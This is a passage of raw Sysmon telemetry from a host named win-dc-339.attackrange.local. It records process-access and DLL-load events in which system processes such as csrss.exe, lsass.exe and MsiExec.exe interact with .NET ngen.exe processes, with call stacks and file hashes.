Corporationtaskschd.dllMD5=34A9F9DAEE26461B55530C53F503C379,SHA256=B1F1A125B0F8B0C314647BD0A9180FFEDC21EA2C4699B0DAC4F84BE26EDD9A05,IMPHASH=EBE95B59B3B2C846CFC2203F3084575CtrueMicrosoft WindowsValid 10341000x800000000000000073937Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.843{A7A01FEF-EBD1-607E-2B0C-00000000BB01}35443528C:\Windows\system32\conhost.exe{A7A01FEF-EBD1-607E-2A0C-00000000BB01}4976c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073936Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.843{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBD1-607E-2B0C-00000000BB01}3544C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073935Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.827{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBD1-607E-2A0C-00000000BB01}4976c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073934Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.827{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD1-607E-2A0C-00000000BB01}4976c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000073933Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.827{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD1-607E-280C-00000000BB01}5384c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073932Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.811{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD1-607E-280C-00000000BB01}5384c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073931Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.811{A7A01FEF-EBD1-607E-280C-00000000BB01}5384C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000073930Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.796{A7A01FEF-EBD1-607E-290C-00000000BB01}68524808C:\Windows\system32\conhost.exe{A7A01FEF-EBD1-607E-280C-00000000BB01}5384c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073929Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.796{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBD1-607E-290C-00000000BB01}6852C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073928Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.796{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBD1-607E-280C-00000000BB01}5384c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073927Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.796{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD1-607E-280C-00000000BB01}5384c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000073926Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.780{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD1-607E-260C-00000000BB01}1116c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073925Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.780{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD1-607E-260C-00000000BB01}1116c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073924Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.780{A7A01FEF-EBD1-607E-260C-00000000BB01}1116C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\SysWOW64\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=34A9F9DAEE26461B55530C53F503C379,SHA256=B1F1A125B0F8B0C314647BD0A9180FFEDC21EA2C4699B0DAC4F84BE26EDD9A05,IMPHASH=EBE95B59B3B2C846CFC2203F3084575CtrueMicrosoft WindowsValid 10341000x800000000000000073923Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.765{A7A01FEF-EBD1-607E-270C-00000000BB01}13883784C:\Windows\system32\conhost.exe{A7A01FEF-EBD1-607E-260C-00000000BB01}1116c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073922Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.749{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBD1-607E-270C-00000000BB01}1388C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073921Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.749{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBD1-607E-260C-00000000BB01}1116c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073920Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.749{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD1-607E-260C-00000000BB01}1116c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000073919Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.733{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD1-607E-240C-00000000BB01}1144c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073918Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.733{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD1-607E-240C-00000000BB01}1144c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073917Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.733{A7A01FEF-EBD1-607E-240C-00000000BB01}1144C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000073916Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.718{A7A01FEF-EBD1-607E-250C-00000000BB01}65885072C:\Windows\system32\conhost.exe{A7A01FEF-EBD1-607E-240C-00000000BB01}1144c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073915Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.718{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBD1-607E-250C-00000000BB01}6588C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073914Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.702{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBD1-607E-240C-00000000BB01}1144c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073913Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.702{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD1-607E-240C-00000000BB01}1144c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000073912Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.702{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD1-607E-220C-00000000BB01}5472c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073911Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.702{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD1-607E-220C-00000000BB01}5472c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073910Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.702{A7A01FEF-EBD1-607E-220C-00000000BB01}5472C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\SysWOW64\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=34A9F9DAEE26461B55530C53F503C379,SHA256=B1F1A125B0F8B0C314647BD0A9180FFEDC21EA2C4699B0DAC4F84BE26EDD9A05,IMPHASH=EBE95B59B3B2C846CFC2203F3084575CtrueMicrosoft WindowsValid 10341000x800000000000000073909Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.671{A7A01FEF-EBD1-607E-230C-00000000BB01}32526372C:\Windows\system32\conhost.exe{A7A01FEF-EBD1-607E-220C-00000000BB01}5472c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073908Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.671{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBD1-607E-230C-00000000BB01}3252C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073907Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.655{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBD1-607E-220C-00000000BB01}5472c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073906Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.655{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD1-607E-220C-00000000BB01}5472c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000073905Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 